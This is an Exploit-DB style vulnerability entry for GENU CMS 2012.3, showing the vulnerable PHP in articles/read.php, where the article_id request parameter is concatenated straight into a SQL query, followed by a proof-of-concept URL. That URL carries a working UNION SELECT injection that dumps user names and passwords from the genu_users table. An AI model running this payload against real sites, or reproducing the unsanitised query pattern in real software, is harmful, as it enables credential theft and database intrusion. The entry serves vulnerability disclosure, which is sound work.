GENU CMS - SQL Injection

Author: hordcode security
type: webapps
platform: php
port: 
date_added: 2012-04-05 
date_updated: 2012-04-05 
verified: 1 
codes: OSVDB-80971 
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt19000/screen-shot-2012-04-05-at-43302-pm.png 
application_url: http://www.exploit-db.comGENU-2012.3.tar.gz

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
GENU CMS SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

bug found by h0rd h0rd[at]null.net
homepage http://h0rd.net
download http://www.gnew.fr/pages/download.php?file=GENU-2012.3.tar.gz
vulnerability in read.php
vuln code:
[...]
include('./../includes/common.php');

page_header($lang['ARTICLES_READ_TITLE']);

if (isset($_GET['article_id']))
{
    $sql->query('SELECT ' . TABLE_ARTICLES . '.article_date, ' . TABLE_ARTICLES . '.article_subject, ' . TABLE_ARTICLES . '.article_text, ' . TABLE_USERS . '.user_id, ' . TABLE_USERS . '.user_name
                 FROM ' . TABLE_ARTICLES . ', ' . TABLE_USERS . '
                 WHERE ' . TABLE_ARTICLES . '.user_id = ' . TABLE_USERS . '.user_id
                 AND ' . TABLE_ARTICLES . '.article_id = ' . $_GET['article_id']);
    $table_articles = $sql->fetch();
[...]

PoC exploit:
http://[host]/articles/read.php?article_id=null union select 1,concat(user_name,0x3a,0x3a,0x3a,user_password),3,4,5 from genu_users--